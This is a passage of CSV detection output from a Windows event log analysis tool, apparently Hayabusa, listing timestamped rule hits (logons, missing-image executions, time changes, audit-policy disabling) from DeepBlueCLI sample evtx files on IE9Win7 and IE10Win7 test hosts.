+09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
+2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : 
Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : 
LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 
+09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 
+09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:31:31.000 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 
